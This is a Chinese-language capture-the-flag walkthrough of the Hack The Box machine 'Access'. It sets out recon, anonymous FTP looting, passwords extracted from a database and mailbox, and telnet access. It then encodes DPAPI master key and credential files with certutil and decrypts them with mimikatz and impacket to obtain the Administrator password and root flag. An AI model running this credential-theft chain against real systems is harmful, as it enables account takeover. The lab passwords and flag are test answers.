Access
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# nmap 10.129.23.31
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-21 11:00 EST
Nmap scan report for 10.129.23.31
Host is up (0.12s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds
1.2. ftp
┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# ftp 10.129.23.31
Connected to 10.129.23.31.
220 Microsoft FTP Service
Name (10.129.23.31:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 08:16PM <DIR> Backups
08-24-18 09:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd backups
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 08:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |******************************************************************************************| 5520 KiB 816.95 KiB/s 00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:06 (816.94 KiB/s)
ftp> cd ../engineer
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18 12:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get Access Control.zip
local: Control.zip remote: Access
200 PORT command successful.
550 The system cannot find the file specified.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |******************************************************************************************| 10870 31.34 KiB/s 00:00 ETA
226 Transfer complete.
10870 bytes received in 00:00 (31.33 KiB/s)
ftp>
这里有 .mdb文件 Microsoft Access 还有一个压缩包文件
在 auth_user 表中发现了密码
admin
access4u@security
正好压缩包是加密的
┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# file Access\ Control.zip
Access Control.zip: Zip archive data, made by v2.0, extract using at least v2.0, last modified Aug 24 2018 01:13:52, uncompressed size 271360, method=AES Encrypted
使用密码 access4u@security 解压后可以获取到一个 Access Control.pst 文件
┌──(root㉿kali)-[~/Desktop/htb/Access/aceess]
└─# ls
'Access Control.pst'
.pst 是Outlook 的数据文件
这里用在线浏览器即可浏览邮件数据
GoldFynch PST viewer
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
1.3. telnet
给了一个凭据 security 4Cc3ssC0ntr0ller
目标的telnet需要认证
┌──(root㉿kali)-[~/Desktop/htb/Access/aceess]
└─# telnet 10.129.23.31
Trying 10.129.23.31...
Connected to 10.129.23.31.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security
2. system
2.1. ZKTeco
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\
08/23/2018 10:05 PM <DIR> inetpub
07/14/2009 03:20 AM <DIR> PerfLogs
08/23/2018 08:53 PM <DIR> Program Files
08/24/2018 07:40 PM <DIR> Program Files (x86)
08/24/2018 07:39 PM <DIR> temp
08/21/2018 10:31 PM <DIR> Users
07/14/2021 01:04 PM <DIR> Windows
>>>> 08/22/2018 07:23 AM <DIR> ZKTeco
0 File(s) 0 bytes
8 Dir(s) 3,343,654,912 bytes free
C盘发现有一个 ZKTeco ,这不太常见,
看下目录
C:\Users\Public>dir /s /a
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\Public
07/14/2009 04:57 AM <DIR> .
07/14/2009 04:57 AM <DIR> ..
08/28/2018 06:51 AM <DIR> Desktop
07/14/2009 04:57 AM 174 desktop.ini
07/14/2009 05:06 AM <DIR> Documents
07/14/2009 04:57 AM <DIR> Downloads
07/14/2009 02:34 AM <DIR> Favorites
07/14/2009 04:57 AM <DIR> Libraries
07/14/2009 04:57 AM <DIR> Music
07/14/2009 04:57 AM <DIR> Pictures
07/14/2009 04:57 AM <DIR> Videos
1 File(s) 174 bytes
Directory of C:\Users\Public\Desktop
08/28/2018 06:51 AM <DIR> .
08/28/2018 06:51 AM <DIR> ..
07/14/2009 04:57 AM 174 desktop.ini
>>>> 08/22/2018 09:18 PM 1,870 ZKAccess3.5 Security System.lnk
2 File(s) 2,044 bytes
Directory of C:\Users\Public\Documents
07/14/2009 05:06 AM <DIR> .
07/14/2009 05:06 AM <DIR> ..
07/14/2009 04:57 AM 278 desktop.ini
07/14/2009 05:06 AM <JUNCTION> My Music [C:\Users\Public\Music]
07/14/2009 05:06 AM <JUNCTION> My Pictures [C:\Users\Public\Pictures]
07/14/2009 05:06 AM <JUNCTION> My Videos [C:\Users\Public\Videos]
1 File(s) 278 bytes
Directory of C:\Users\Public\Downloads
07/14/2009 04:57 AM <DIR> .
07/14/2009 04:57 AM <DIR> ..
07/14/2009 04:57 AM 174 desktop.ini
1 File(s) 174 bytes
Directory of C:\Users\Public\Favorites
07/14/2009 02:34 AM <DIR> .
07/14/2009 02:34 AM <DIR> ..
0 File(s) 0 bytes
Directory of C:\Users\Public\Libraries
07/14/2009 04:57 AM <DIR> .
07/14/2009 04:57 AM <DIR> ..
07/14/2009 04:57 AM 88 desktop.ini
07/14/2009 04:57 AM 876 RecordedTV.library-ms
2 File(s) 964 bytes
Directory of C:\Users\Public\Music
07/14/2009 04:57 AM <DIR> .
07/14/2009 04:57 AM <DIR> ..
07/14/2009 04:57 AM 380 desktop.ini
07/14/2009 04:57 AM <DIR> Sample Music
1 File(s) 380 bytes
Directory of C:\Users\Public\Music\Sample Music
07/14/2009 04:57 AM <DIR> .
07/14/2009 04:57 AM <DIR> ..
07/14/2009 04:57 AM 174 desktop.ini
1 File(s) 174 bytes
Directory of C:\Users\Public\Pictures
07/14/2009 04:57 AM <DIR> .
07/14/2009 04:57 AM <DIR> ..
07/14/2009 04:57 AM 380 desktop.ini
07/14/2009 04:57 AM <DIR> Sample Pictures
1 File(s) 380 bytes
Directory of C:\Users\Public\Pictures\Sample Pictures
07/14/2009 04:57 AM <DIR> .
07/14/2009 04:57 AM <DIR> ..
07/14/2009 04:57 AM 174 desktop.ini
1 File(s) 174 bytes
Directory of C:\Users\Public\Videos
07/14/2009 04:57 AM <DIR> .
07/14/2009 04:57 AM <DIR> ..
07/14/2009 04:57 AM 380 desktop.ini
07/14/2009 04:57 AM <DIR> Sample Videos
1 File(s) 380 bytes
Directory of C:\Users\Public\Videos\Sample Videos
07/14/2009 04:57 AM <DIR> .
07/14/2009 04:57 AM <DIR> ..
07/14/2009 04:57 AM 174 desktop.ini
1 File(s) 174 bytes
Total Files Listed:
13 File(s) 5,296 bytes
38 Dir(s) 3,343,654,912 bytes free
有个lnk 看一下
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
LF@ 7#P/PO :+00/C:\R1M:Windows:M:*wWindowsV1MVSystem32:MV*System32X2P:
runas.exe:1:1*Yrunas.exeL-KEC:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%
wN]ND.Q`Xaccess_8{E3
Oj)H
)ΰ[_8{E3
Oj)H
)ΰ[ 1SPSXFL8C&me*S-1-5-21-953262931-566350628-63446256-500
runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred
通过这个命令可以看出管理员的密码已被保存了
2.2. DPAPI
可以尝试一下解密 DPAPI
首先获取主密钥
#主密钥
C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID
#blob
C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\
这里参考 0xdf的方法,用certutil把文件编码后再查看,也可以用ftp传
C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001>certutil -encode 0792c32e-48a5-4fe3-8b43-d93d64590580 output
Input Length = 468
Output Length = 700
CertUtil: -encode command completed successfully.
C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001>type output
-----BEGIN CERTIFICATE-----
AgAAAAAAAAAAAAAAMAA3ADkAMgBjADMAMgBlAC0ANAA4AGEANQAtADQAZgBlADMA
LQA4AGIANAAzAC0AZAA5ADMAZAA2ADQANQA5ADAANQA4ADAAAAAAAAAAAAAFAAAA
sAAAAAAAAACQAAAAAAAAABQAAAAAAAAAAAAAAAAAAAACAAAAnFHKTQBwjHPU+/9g
uV5UnvhDAAAOgAAAEGYAAOePsdmJxMzXoFKFwX+uHDGtEhD3raBRrjIDU232E+Y6
DkZHyp7VFAdjfYwcwq0WsjBqq1bX0nB7DHdCLn3jnri9/MpVBEtKf4U7bwszMyE7
Ww2Ax8ECH2xKwvX6N3KtvlCvf98HsODqlA1woSRdt9+Ef2FVMKk4lQEqOtnHqMOc
wFktBtcUye6P40ztUGLEEgIAAABLtt2bW5ZW2Xt48RR5ZFf0+EMAAA6AAAAQZgAA
D+azql3Tr0a9eofLwBYfxBrhP4cUoivLW9qG8k2VrQM2mlM1FZGF0CdnQ9DBEys1
/a/60kfTxPX0MmBBPCi0Ae1w5C4BhPnoxGaKvDbrcye9LHN0ojgbTN1Op8Rl3qp1
Xg9TZyRzkA24hotCgyftqgMAAADlaJYABZMbQLoN36DhGzTQ
-----END CERTIFICATE-----
在获取一下加密的blob
C:\Users\security\AppData\Roaming\Microsoft\Credentials>certutil -encode 51AB168BE4BDB3A603DADE4F8CA81290 output
Input Length = 538
Output Length = 800
CertUtil: -encode command completed successfully.
C:\Users\security\AppData\Roaming\Microsoft\Credentials>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security\AppData\Roaming\Microsoft\Credentials
11/21/2025 04:52 PM 800 output
1 File(s) 800 bytes
0 Dir(s) 3,343,921,152 bytes free
C:\Users\security\AppData\Roaming\Microsoft\Credentials>type output
-----BEGIN CERTIFICATE-----
AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6VI40+LQ9k9
ZFkFgAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQA
aQBhAGwAIABEAGEAdABhAA0ACgAAABBmAAAAAQAAIAAAAPW7usJAvZDZr308LPt/
MB8fEjrJTQejzAEgOBNfpaa8AAAAAA6AAAAAAgAAIAAAAPlkLTI/rjZqT3KT0C8m
5Ecq3DKwC6xqBhkURY2t/T5SAAEAAOc1Qv9x0IUp+dpf+I7c1b5E0RycAsRf39nu
WlMWKMsPno3CIetbTYOoV6/xNHMTHJJ1JyF/4XfgjWOmPrXOU0FXazMzKAbgYjY+
WHhvt1Uaqi4GdrjjlX9Dzx8Rou0UnEMRBOX5PyA2SRbfJaAWjt4jeIvZ1xGSzbZh
xcVobtJWyGkQV/5v4qKxdlugl57pFAwBAhDuqBrACDD3TDWhlqwfRr1p16hsqC2h
X5u88cQMu+QdWNSokkr96X4qmabp8zopfvJQhAHCKaRRuRHpRpuhfXEojcbDfuJs
ZezIrM1LWzwMLM/K5rCnY4Sg4nxO23oOzs4q/ZiJJSME21dnu8NAAAAAY/zBU7zW
C+/QdKUJjqDlUviAlWLFU5hbqocgqCjmHgW9XRy4IAcRVRoQDtO4U1mLOHW6kLaJ
vEgzQvv2cbicmQ==
-----END CERTIFICATE-----
然后本地解密
2.2.1. 方法1:使用mimikatz
mimikatz # dpapi::masterkey /in:master_key /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {0792c32e-48a5-4fe3-8b43-d93d64590580}
dwFlags : 00000005 - 5
dwMasterKeyLen : 000000b0 - 176
dwBackupKeyLen : 00000090 - 144
dwCredHistLen : 00000014 - 20
dwDomainKeyLen : 00000000 - 0
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 9c51ca4d00708c73d4fbff60b95e549e
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 4bb6dd9b5b9656d97b78f114796457f4
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa
[credhist]
**CREDHIST INFO**
dwVersion : 00000003 - 3
guid : {009668e5-9305-401b-ba0d-dfa0e11b34d0}
[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe
然后利用内存中的masterkey解密blob
mimikatz # dpapi::cred /in:blob
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {0792c32e-48a5-4fe3-8b43-d93d64590580}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
dwDataLen : 00000100 - 256
pbData : e73542ff71d08529f9da5ff88edcd5be44d11c9c02c45fdfd9ee5a531628cb0f9e8dc221eb5b4d83a857aff13473131c927527217fe177e08d63a63eb5ce5341576b33332806e062363e58786fb7551aaa2e0676b8e3957f43cf1f11a2ed149c431104e5f93f20364916df25a0168ede23788bd9d71192cdb661c5c5686ed256c8691057fe6fe2a2b1765ba0979ee9140c010210eea81ac00830f74c35a196ac1f46bd69d7a86ca82da15f9bbcf1c40cbbe41d58d4a8924afde97e2a99a6e9f33a297ef2508401c229a451b911e9469ba17d71288dc6c37ee26c65ecc8accd4b5b3c0c2ccfcae6b0a76384a0e27c4edb7a0ecece2afd9889252304db5767bbc3
dwSignLen : 00000040 - 64
pbSign : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99
Decrypting Credential:
* volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe;Key:available
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000f4 - 244
credUnk0 : 00002004 - 8196
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 2018/8/22 21:18:49
unkFlagsOrSize : 00000038 - 56
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=ACCESS\Administrator
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : ACCESS\Administrator
>>>> CredentialBlob : 55Acc3ssS3cur1ty@megacorp
Attributes : 0
使用密码登录管理员账号
┌──(root㉿kali)-[~/Desktop/htb/Access/aceess]
└─# telnet 10.129.23.31
Trying 10.129.23.31...
Connected to 10.129.23.31.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: administrator
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>cd desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\Administrator\Desktop
07/14/2021 02:40 PM <DIR> .
07/14/2021 02:40 PM <DIR> ..
11/21/2025 04:00 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,343,921,152 bytes free
C:\Users\Administrator\Desktop>type root.txt
266ee379769c78f68bc3b47a613fc264
2.2.2. 方法2:使用impacket-dpapi
解密master_key
┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# impacket-dpapi masterkey -file master_key -sid S-1-5-21-953262931-566350628-63446256-1001 -password 4Cc3ssC0ntr0ller
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 0792c32e-48a5-4fe3-8b43-d93d64590580
Flags : 5 (5)
Policy : 0 (0)
MasterKeyLen: 000000b0 (176)
BackupKeyLen: 00000090 (144)
CredHistLen : 00000014 (20)
DomainKeyLen: 00000000 (0)
Decrypted key with User Key (SHA1)
Decrypted key: 0xb360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
利用master_key解密Blob
┌──(root㉿kali)-[~/Desktop/htb/Access]
└─# impacket-dpapi credential -file blob -key 0xb360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c43
44a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2018-08-22 21:18:49+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:interactive=ACCESS\Administrator
Description :
Unknown :
Username : ACCESS\Administrator
>>>> Unknown : 55Acc3ssS3cur1ty@megacorp